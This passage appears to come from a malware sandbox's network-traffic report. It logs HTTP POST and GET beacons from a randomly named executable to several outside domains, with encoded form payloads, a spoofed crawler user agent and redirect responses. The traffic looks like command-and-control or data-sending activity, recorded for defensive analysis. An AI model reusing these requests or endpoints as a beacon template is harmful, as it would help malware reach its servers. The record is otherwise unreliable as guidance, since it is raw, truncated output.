                                                          Data Raw: 44 30 50 74 73 30 34 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 48 42 66 32 68 71 64 66 74 4f 37 78 51 70 34 77 34 4a 55 76 46 43 70 68 72 33 53 6a 4b 34 38 35 4f 71 6c 34 4b 4a 30 64 37 41 4b 70 61 44 43 45 69 35 58 76 49 6e 6b 50 64 56 6f 32 6e 31 6f 44 59 6f 38 54 31 33 64 42 37 65 48 76 53 38 65 79 74 34 46 39 43 7a 4e 49 36 64 33 66 4e 7a 39 72 57 36 4d 72 59 6c 35 44 70 6a 46 45 56 78 4a 56 76 35 77 4b 33 79 75 7a 69 73 69 4a 77 78 56 79 41 33 36 78 67 79 42 36 49 78 75 64 71 66 6a 31 34 64 4a 78 54 5a 73 4e 6c 34 69 61 37 49 5a 66 36 57 34 4e 31 70 2b 63 4d 48 4f 75 76 44 70 68 35 43 37 2b 69 52 51 4e 78 79 6b 6b 48 6a 6c 61 41 49 44 30 62 78 6d 66 70 44 35 6d 6a 59 30 77 47 38 4e 72 57 51 3d 3d
                                                          Data Ascii: D0Pts04=c+TIz73J0JxBHBf2hqdftO7xQp4w4JUvFCphr3SjK485Oql4KJ0d7AKpaDCEi5XvInkPdVo2n1oDYo8T13dB7eHvS8eyt4F9CzNI6d3fNz9rW6MrYl5DpjFEVxJVv5wK3yuzisiJwxVyA36xgyB6Ixudqfj14dJxTZsNl4ia7IZf6W4N1p+cMHOuvDph5C7+iRQNxykkHjlaAID0bxmfpD5mjY0wG8NrWQ==


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          15192.168.2.6497373.33.130.19080
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:51.266316891 CEST1774OUTPOST /8td2/ HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.atlpicsstudios.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.atlpicsstudios.com/8td2/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 48 42 66 32 68 71 64 66 74 4f 37 78 51 70 34 77 34 4a 55 76 46 43 70 68 72 33 53 6a 4b 37 63 35 4f 66 78 34 4b 71 63 64 68 41 4b 70 42 44 43 46 69 35 57 2f 49 6e 38 4c 64 56 31 44 6e 32 51 44 4b 65 77 54 79 43 70 42 79 65 48 76 51 38 65 7a 69 59 45 2f 43 7a 64 79 36 64 6e 66 4e 7a 39 72 57 38 41 72 4d 45 35 44 72 6a 46 48 53 78 4a 6a 72 35 77 75 33 79 58 45 69 76 50 38 77 42 31 79 42 58 71 78 76 6b 64 36 55 68 75 66 70 66 6a 74 34 64 31 51 54 5a 78 30 6c 34 58 78 37 4c 46 66 33 53 74 35 77 4b 6a 41 50 46 61 77 78 6b 56 64 67 55 72 42 75 41 46 33 30 45 30 7a 46 6a 74 61 5a 5a 32 74 50 52 54 39 68 51 6c 6b 6a 59 46 64 44 2f 73 73 57 43 4c 4e 33 2f 64 2b 45 42 4f 6d 2b 4f 78 57 33 41 75 77 78 4a 77 32 6e 75 71 53 31 59 58 74 71 6d 73 4d 61 41 30 35 53 4d 66 54 38 4e 72 31 46 74 6b 72 74 7a 34 54 49 44 42 78 65 64 4f 62 7a 73 54 63 4b 55 4b 56 72 6a 69 42 4c 38 4d 45 6e 6e 4a 4f 4a 56 68 75 39 6b 46 70 54 6f 76 50 72 6f 7a 70 43 42 77 76 39 52 [TRUNCATED]
                                                          Data Ascii: D0Pts04=c+TIz73J0JxBHBf2hqdftO7xQp4w4JUvFCphr3SjK7c5Ofx4KqcdhAKpBDCFi5W/In8LdV1Dn2QDKewTyCpByeHvQ8eziYE/Czdy6dnfNz9rW8ArME5DrjFHSxJjr5wu3yXEivP8wB1yBXqxvkd6Uhufpfjt4d1QTZx0l4Xx7LFf3St5wKjAPFawxkVdgUrBuAF30E0zFjtaZZ2tPRT9hQlkjYFdD/ssWCLN3/d+EBOm+OxW3AuwxJw2nuqS1YXtqmsMaA05SMfT8Nr1Ftkrtz4TIDBxedObzsTcKUKVrjiBL8MEnnJOJVhu9kFpTovProzpCBwv9R9uGDhGdo82358GJdmNxgWSyuDdGG/fiRyhYHQCYgEYkHEeFFBVMK5C1Q4Tn952Amrktdm9W5ZWKnUdDihanxXFmdEtlN1FVYoUGzI7IfRcZlC9LW4rY3ULAdqPD97roHa5/M2maXXLytIsbBgWB8pHhJ+nkJyBSVkCMZCUcHZ1wF81i6JJVJI62oaopQLI3taowcdG+52gyRPXhTRFkUmwpZLv3vWzZtA8ccDjCUTxkw40FKCtVNaV9Jb7ionk9XcYQoO+dn6NR44/fjBgvDNHONtX6vp/uRW3kI2UH2KrAn9pndmvzahPP7DPnlVdYp59K7muVTXSdQE0hbGxLnZFIsaChY1uYLoMsWto4MJuHV+MhTu4eX4Lgx/geN5t7z9+7dEBHDoiDeyIgvOmALKuDi2hTHsArVKOsfiM0EAPPGRvdVwufV8dUlGmy5lNcd0IW+8EtaF653pyuFbm5DEUqMuVQDQ+HZ/FQVxz7IEBZ45ZzTLiNqoLh/oLxqzrMlFsygK0eEUoz3hSa9oYP8w9KNxB17HwYyeZGG7BJyiBWLA1THwJeovTsJU8cu/+qPKbzoXGyR3AXzjtheMf5gmEH8EF+Aoq3saCChh6A1aeB2zJvI5inEN6kuZ5rQH/0IaE9t/VHyN8yvdwbXpt73tlcjPMwpjh/rX2 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.6497383.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:53.802059889 CEST472OUTGET /8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:54.261599064 CEST418INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 52 38 37 6f 77 4d 44 6c 76 2f 67 50 58 42 2b 69 71 34 35 63 69 38 6a 63 52 73 38 77 39 62 55 48 43 69 70 37 67 77 69 45 4c 5a 74 6f 4b 35 77 6d 48 61 34 56 36 33 57 34 45 67 4c 38 6d 4e 48 6d 53 56 4e 68 59 67 46 74 75 30 63 5a 55 38 77 70 39 7a 5a 68 33 37 43 6c 65 2b 57 4e 74 4b 59 6d 64 79 77 6b 6a 64 36 52 50 6a 35 59 56 4b 55 66 46 46 31 4d 39 52 64 6f 51 52 55 31 30 61 6b 41 76 53 76 72 70 36 38 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.6497393.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:59.298512936 CEST719OUTPOST /euu6/ HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.bearclaw.bot
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.bearclaw.bot/euu6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 66 77 6a 37 77 49 34 76 6a 44 46 59 43 73 59 6d 32 71 57 59 6c 4f 6a 4e 47 4b 67 66 71 76 4b 76 4d 66 72 41 64 74 6a 45 6a 64 44 74 7a 51 4b 4b 57 4f 47 50 31 32 75 31 6d 66 71 6f 4e 68 68 7a 6d 77 4b 71 76 55 31 50 6f 73 2b 36 62 6e 62 38 4b 51 33 50 47 44 68 4b 43 74 45 7a 31 43 77 51 51 51 62 54 49 4e 58 2f 62 45 50 61 53 5a 41 56 76 62 31 59 54 55 63 62 7a 6a 31 48 33 61 4a 47 4e 77 77 62 52 55 53 35 38 4e 42 4a 33 4c 66 41 62 57 77 4d 49 6d 37 2b 70 78 32 56 71 7a 42 63 6b 74 2b 62 73 4b 6e 43 51 55 63 66 53 70 57 55 70 34 76 4b 78 64 42 69 59 5a 49 49 47 38 41 6e
                                                          Data Ascii: D0Pts04=FTDkRuuk2Ocrfwj7wI4vjDFYCsYm2qWYlOjNGKgfqvKvMfrAdtjEjdDtzQKKWOGP12u1mfqoNhhzmwKqvU1Pos+6bnb8KQ3PGDhKCtEz1CwQQQbTINX/bEPaSZAVvb1YTUcbzj1H3aJGNwwbRUS58NBJ3LfAbWwMIm7+px2VqzBckt+bsKnCQUcfSpWUp4vKxdBiYZIIG8An


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.6497403.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:01.828516960 CEST743OUTPOST /euu6/ HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.bearclaw.bot
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.bearclaw.bot/euu6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 63 51 7a 37 79 76 4d 76 32 54 46 5a 65 38 59 6d 35 4b 57 63 6c 4f 76 4e 47 49 4d 50 71 63 2b 76 4d 37 6a 41 63 76 4c 45 69 64 44 74 72 67 4b 50 62 75 47 55 31 32 69 44 6d 65 57 6f 4e 68 64 7a 6d 77 36 71 76 48 64 49 70 38 2b 76 4f 33 62 2b 48 77 33 50 47 44 68 4b 43 74 51 5a 31 43 34 51 51 67 4c 54 4c 73 58 34 45 30 50 64 56 5a 41 56 72 62 31 45 54 55 64 2b 7a 69 34 67 33 63 46 47 4e 30 30 62 52 46 53 34 32 4e 42 50 35 72 65 41 4c 57 52 57 4a 30 4f 31 6d 67 33 34 39 69 63 6d 73 37 2f 42 77 35 6e 68 43 45 38 64 53 72 4f 6d 70 59 76 67 7a 64 35 69 4b 4f 45 76 4a 49 6c 45 67 59 76 56 4b 41 79 67 2f 4d 47 53 4a 35 45 57 75 6d 56 4c 52 77 3d 3d
                                                          Data Ascii: D0Pts04=FTDkRuuk2OcrcQz7yvMv2TFZe8Ym5KWclOvNGIMPqc+vM7jAcvLEidDtrgKPbuGU12iDmeWoNhdzmw6qvHdIp8+vO3b+Hw3PGDhKCtQZ1C4QQgLTLsX4E0PdVZAVrb1ETUd+zi4g3cFGN00bRFS42NBP5reALWRWJ0O1mg349icms7/Bw5nhCE8dSrOmpYvgzd5iKOEvJIlEgYvVKAyg/MGSJ5EWumVLRw==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.6497413.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:04.359688044 CEST1756OUTPOST /euu6/ HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.bearclaw.bot
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.bearclaw.bot/euu6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 63 51 7a 37 79 76 4d 76 32 54 46 5a 65 38 59 6d 35 4b 57 63 6c 4f 76 4e 47 49 4d 50 71 63 6d 76 4d 4d 6a 41 64 49 2f 45 68 64 44 74 69 41 4b 4f 62 75 47 56 31 31 54 4b 6d 65 62 54 4e 6e 5a 7a 6e 52 61 71 37 69 70 49 6e 38 2b 76 4d 33 62 39 4b 51 33 67 47 41 49 43 43 74 41 5a 31 43 34 51 51 6a 6a 54 66 4e 58 34 43 30 50 61 53 5a 41 5a 76 62 31 34 54 55 45 44 7a 69 74 58 32 73 6c 47 4e 55 6b 62 58 7a 4f 34 72 64 42 4e 34 62 65 75 4c 57 63 49 4a 77 75 49 6d 67 43 6a 39 67 41 6d 6d 38 50 63 71 59 58 37 61 6e 51 6b 44 4b 6d 62 72 2f 2f 7a 2b 73 6b 53 61 76 4d 4e 49 73 68 7a 70 39 33 32 4f 44 37 4e 77 39 79 4f 41 64 52 56 6a 47 49 77 53 55 48 37 41 48 34 78 4b 71 6f 49 44 54 48 33 41 68 4a 35 39 55 6b 39 4e 53 64 64 36 68 38 43 33 78 6f 35 6d 44 6b 33 63 31 39 32 2b 45 55 4a 6a 73 70 53 6d 30 57 7a 38 4b 33 35 70 69 48 63 5a 6c 43 59 30 54 46 62 75 51 42 4f 79 31 6b 71 34 56 69 68 54 63 2f 4a 4e 47 4a 71 61 69 47 74 65 51 6a 78 63 54 6b 62 72 6c [TRUNCATED]
                                                          Data Ascii: D0Pts04=FTDkRuuk2OcrcQz7yvMv2TFZe8Ym5KWclOvNGIMPqcmvMMjAdI/EhdDtiAKObuGV11TKmebTNnZznRaq7ipIn8+vM3b9KQ3gGAICCtAZ1C4QQjjTfNX4C0PaSZAZvb14TUEDzitX2slGNUkbXzO4rdBN4beuLWcIJwuImgCj9gAmm8PcqYX7anQkDKmbr//z+skSavMNIshzp932OD7Nw9yOAdRVjGIwSUH7AH4xKqoIDTH3AhJ59Uk9NSdd6h8C3xo5mDk3c192+EUJjspSm0Wz8K35piHcZlCY0TFbuQBOy1kq4VihTc/JNGJqaiGteQjxcTkbrlMV+hvh+Y6jSImA0bPksd6Iq8HoYmCqvpnqV70S5gjlcx9czYAqwdfS/oSseuP6A14g3fcBUH6Wf5RvkJdSDTtFyq3ogwfIMUpqjdiKRy7Y2qxleqHslnWZohuhn5cSztOW2HF8TTv5F7EcxuqYyH2JaB4HW7/LvBm8H/DcPl+7evAv2VIcRp75IjM3Z/pgUKipjWA5HCvoifhlCSFdJkk649NRnpkSG17z8cOMzthY/dLeXGt4ZIJ3dBhgRktB/mjOD3i0GhUGlGOs/Yg5rJnxfQFHMcp8VC8cUy5kyjFsARsHnphg1v9a4fkzFmLObNLa4CHPNrIgW24mm6/a1WOJ59OtuggMc0dsMAyjsEPalWvZXN38gQZth2xZLZCNWWi49ytqBVYk5g18zj9gAsE6Ot24wXj8U5rXhs90f9kiVN1HNVseFgAYwfLTCCQYGv/vpk7e58B9yhm1FybAxRPMUPDUER4GRhXhtJRd0Wz1PeA/Igf776reU72glHCtQtvBq0UJ9CTBbTlAhDjDBLaOlw6mWXemy5+ZpC0+E3UyoRHXl5Qbe0pqLYsY1x5VX5SAKO/aq5KCk0CQ7zyMb2TYmo8AiPKF/hjWB2fUrE/rMzZ4k+PMX9/5eXEYeRpyXrWPOjNBMbnbeIjou2iROnYn9k8Vg9yRe+av [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.6497433.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:06.889780998 CEST466OUTGET /euu6/?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:07.348738909 CEST418INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:04:07 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 49 52 72 45 53 62 65 68 70 39 41 34 63 30 61 72 72 4e 68 42 32 53 51 47 48 71 59 68 35 70 32 52 79 39 2f 38 50 74 4d 55 6a 66 62 36 43 73 48 63 66 64 79 48 35 66 66 6a 72 69 44 56 51 64 37 53 74 47 2f 53 6f 70 6a 38 44 45 64 73 73 67 4f 6b 39 6a 52 61 71 4f 65 75 42 32 71 7a 43 56 58 73 48 78 49 42 52 2f 4a 74 33 44 67 61 55 58 6e 6f 57 4e 62 76 4d 43 58 59 58 36 78 6f 79 37 56 75 51 78 30 68 37 56 63 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.64974451.89.93.192805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:12.451656103 CEST722OUTPOST /wlsq/ HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.noghteyab.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.noghteyab.com/wlsq/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 6f 6d 50 41 2f 63 48 6b 53 45 76 52 66 6f 59 44 4d 6e 6c 43 66 43 58 46 79 72 51 77 74 76 56 6b 2f 63 4c 76 6d 54 70 74 5a 47 56 6c 61 39 77 78 71 78 41 55 4c 75 2f 78 6c 61 61 6d 76 64 57 4b 45 74 50 6b 52 6c 2f 55 2b 6d 46 69 65 35 7a 6e 43 44 69 4b 4a 71 4e 61 30 50 6f 6c 78 76 52 38 57 4b 6b 46 50 38 75 77 39 71 4f 48 43 2b 66 45 2f 32 43 75 4c 74 44 74 6d 38 77 39 65 77 72 77 54 79 75 4a 38 6e 48 42 6b 6d 56 56 76 47 74 48 59 4d 38 69 58 72 79 78 65 64 74 6e 55 38 54 5a 36 6f 67 53 45 79 57 6b 49 34 52 2f 4d 75 75 70 6c 51 4f 6c 39 34 51 55 69 77 79 33 31 4e 42 6e
                                                          Data Ascii: D0Pts04=wEVpZkHO0lSaomPA/cHkSEvRfoYDMnlCfCXFyrQwtvVk/cLvmTptZGVla9wxqxAULu/xlaamvdWKEtPkRl/U+mFie5znCDiKJqNa0PolxvR8WKkFP8uw9qOHC+fE/2CuLtDtm8w9ewrwTyuJ8nHBkmVVvGtHYM8iXryxedtnU8TZ6ogSEyWkI4R/MuuplQOl94QUiwy31NBn
                                                          Jul 13, 2024 00:04:13.092093945 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 12 Jul 2024 22:04:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=gg5a4tm1c4tr3af48flbe1kcvi; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 35 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cd 6e dc 36 10 3e db 4f c1 ea 50 b7 c0 ee ca 4e 93 d6 48 24 19 69 62 03 29 82 1c f2 07 f4 54 70 25 ee 8a 36 45 ca 24 b5 1b 3d 41 df a0 bd 14 bd 15 05 8a f6 d0 5b ef 79 95 22 e8 63 f4 1b 52 da 9f c0 09 02 78 61 60 b9 d2 cc 37 33 df fc d1 87 59 ed 1b 55 1c 66 b5 e0 55 71 78 90 79 e9 95 28 1e 9b 86 4b cd 5e 74 ae 15 da 49 a3 b3 34 be 80 44 23 3c 67 b5 f7 ed 54 5c 77 72 95 27 8f 8c f6 42 fb e9 cb be 15 09 2b e3 af 3c f1 e2 8d 4f 09 fd 01 2b 6b 6e 9d f0 79 e7 17 d3 d3 84 cc 28 a9 af 58 6d c5 22 3f 22 28 77 3f 4d 17 50 74 b3 a5 31 4b 25 78 2b dd ac 34 4d 5a 3a 77 b6 e0 8d 54 7d fe dc cc 8d 37 f7 ef 1e 1f 4f be 3a 3e 3e 62 56 a8 fc c8 f9 5e 09 57 0b e1 8f 98 87 fd fc 28 98 85 da 11 cc 8c 86 48 34 d9 8a 26 d1 72 52 71 cf d3 f8 38 7e cd a0 b7 75 ef 13 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ea 59 a9 b8 73 60 80 cf 95 98 ae 2d 6f 5b 61 03 ae 2b ad 6c 3d 73 b6 cc 93 31 ee f5 7a 3d 44 1d 22 b6 a2 e4 ad 07 63 29 48 98 5d ba b3 5a e5 42 27 45 96 46 e5 e2 f0 30 ab e4 6a [TRUNCATED]
                                                          Data Ascii: 554Wn6>OPNH$ib)Tp%6E$=A[y"cRxa`73YUfUqxy(K^tI4D#<gT\wr'B+<O+kny(Xm"?"(w?MPt1K%x+4MZ:wT}7O:>>bV^W(H4&rRq8~u*YYs`-o[a+l=s1z=D"c)H]ZB'EF0jF),Ik}\P8<8`QS'(=^2-m/I/O#<cZqd}1a'r,"9+OfY{yduz^lU#D^*,DX@q,.,oB78E]y[_/({-}-X_~o\x\[TXhsfU""w9za>BwP{'7MC</R:&u4r!KY!q']-<zZgm8gK-*8u\X7HDx97lO*xjX]=0LC}-5+Y;k3k-#|3O/<!:a0*D>@t7CPwL RxX'X{7c/.E s[`Nv-;h
                                                          Jul 13, 2024 00:04:13.092156887 CEST506INData Raw: 2d 73 81 71 6d 98 32 88 d6 22 67 ce a8 95 80 8d 0b 84 12 f8 1f 52 03 13 06 8b 83 6c 50 96 07 41 a6 a9 c6 94 ea 27 ac c5 a2 74 62 f4 e3 83 a9 db a6 6a 00 1e 33 36 c2 0a a0 53 14 7b a4 44 52 e1 03 e1 a2 9b 16 c8 1e e4 b0 94 61 76 08 7b 4f 01 a8 25
                                                          Data Ascii: -sqm2"gRlPA'tbj36S{DRav{O%8bE% ;sr5RA$ajv%YM)p{7{N8kQ&'V6gszUxR|E)77%esr]/W


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.64974551.89.93.192805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:04:14.984235048 CEST746OUTPOST /wlsq/ HTTP/1.1
                                                          Host: www.noghteyab.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.noghteyab.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.noghteyab.com/wlsq/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 45 56 70 5a 6b 48 4f 30 6c 53 61 36 57 2f 41 76 50 66 6b 65 30 76 53 42 34 59 44 44 48 6b 46 66 43 54 46 79 71 6b 61 74 39 68 6b 2f 35 76 76 6c 53 70 74 4a 57 56 6c 56 64 77 2b 75 78 41 66 4c 75 7a 44 6c 61 6d 6d 76 5a 2b 4b 45 73 2f 6b 51 53 4c 58 2b 32 46 67 46 4a 7a 6c 64 54 69 4b 4a 71 4e 61 30 50 39 74 78 76 4a 38 4b 71 55 46 41 39 75 7a 68 61 4f 41 56 4f 66 45 31 57 43 71 4c 74 44 45 6d 2b 56 67 65 79 54 77 54 7a 65 4a 38 57 48 43 76 6d 56 4d 69 6d 73 6c 49 63 77 6d 65 39 37 71 51 75 6c 54 48 2b 62 34 37 65 68 49 59 42 57 48 61 6f 78 39 4d 73 32 62 6c 77 4f 50 2f 34 6f 55 77 6e 2b 51 36 35 6b 45 5a 69 56 70 47 6c 73 6b 76 4a 6d 53 52 68 33 72 4c 50 48 61 44 51 3d 3d
                                                          Data Ascii: D0Pts04=wEVpZkHO0lSa6W/AvPfke0vSB4YDDHkFfCTFyqkat9hk/5vvlSptJWVlVdw+uxAfLuzDlammvZ+KEs/kQSLX+2FgFJzldTiKJqNa0P9txvJ8KqUFA9uzhaOAVOfE1WCqLtDEm+VgeyTwTzeJ8WHCvmVMimslIcwme97qQulTH+b47ehIYBWHaox9Ms2blwOP/4oUwn+Q65kEZiVpGlskvJmSRh3rLPHaDQ==
                                                          Jul 13, 2024 00:04:15.616523027 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0 (Ubuntu)
